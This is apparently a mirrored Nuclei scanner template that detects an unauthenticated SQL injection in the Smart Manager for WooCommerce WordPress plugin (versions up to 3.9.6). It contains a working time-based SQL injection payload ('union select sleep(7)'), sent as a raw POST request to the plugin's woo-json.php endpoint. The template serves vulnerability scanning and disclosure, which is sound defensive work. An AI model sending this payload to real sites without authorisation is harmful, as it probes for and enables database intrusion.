mirror of
https://github.com/projectdiscovery/nuclei-templates.git
synced 2026-02-06 02:33:22 +08:00
41 lines
1.7 KiB
YAML
41 lines
1.7 KiB
YAML
id: wp-smart-manager-sqli
|
||
|
||
info:
|
||
name: Smart Manager for WooCommerce & WPeC <= 3.9.6 - SQL Injection
|
||
author: r3Y3r53
|
||
severity: critical
|
||
description: |
|
||
The Smart Manager For WooCommerce – Stock Management, Bulk Edit & more… WordPress plugin was affected by an Unauthenticated SQL Injection security vulnerability.
|
||
remediation: Fixed in version 3.9.7
|
||
reference:
|
||
- https://wpscan.com/vulnerability/e060fbff-792f-4fb5-baa5-82d80240ec99
|
||
- http://cinu.pl/research/wp-plugins/mail_0666ceeca20683907bf82514e8f93e0f.html
|
||
- https://wordpress.org/plugins/smart-manager-for-wp-e-commerce/
|
||
metadata:
|
||
verified: true
|
||
max-request: 2
|
||
publicwww-query: "/wp-content/plugins/smart-manager-for-wp-e-commerce/"
|
||
tags: time-based-sqli,wpscan,wp,wp-plugin,wordpress,smart-manager-for-wp-e-commerce,sqli
|
||
|
||
http:
|
||
- raw:
|
||
- |
|
||
GET /wp-content/plugins/smart-manager-for-wp-e-commerce/readme.txt HTTP/1.1
|
||
Host: {{Hostname}}
|
||
- |
|
||
@timeout: 15s
|
||
POST /wp-content/plugins/smart-manager-for-wp-e-commerce/sm/woo-json.php HTTP/1.1
|
||
Host: {{Hostname}}
|
||
Content-Type: application/x-www-form-urlencoded
|
||
|
||
cmd=saveData&edited=%5B%7B%22id%22%3A%22+1%29+union+select+sleep%287%29%2C2%3B+--+%22%7D%5D
|
||
|
||
matchers:
|
||
- type: dsl
|
||
dsl:
|
||
- 'duration_2>=7'
|
||
- 'status_code_2 == 500'
|
||
- 'contains(body_1, "Smart Manager for e-Commerce")'
|
||
- 'contains(body_2, "rel=\"preconnect") || contains(body, "Error</title>")'
|
||
condition: and
|
||
# digest: 4a0a00473045022100ad0e481b6ed636a3de6c23f4b70867ff731353b22da2ac32033eabb5a9c3e55d0220406d82e2a1da1c64e3e6343bc1fc91a0c7d60b76e989b9a5f3dda802fe507950:922c64590222798bb761d5b6d8e72950 |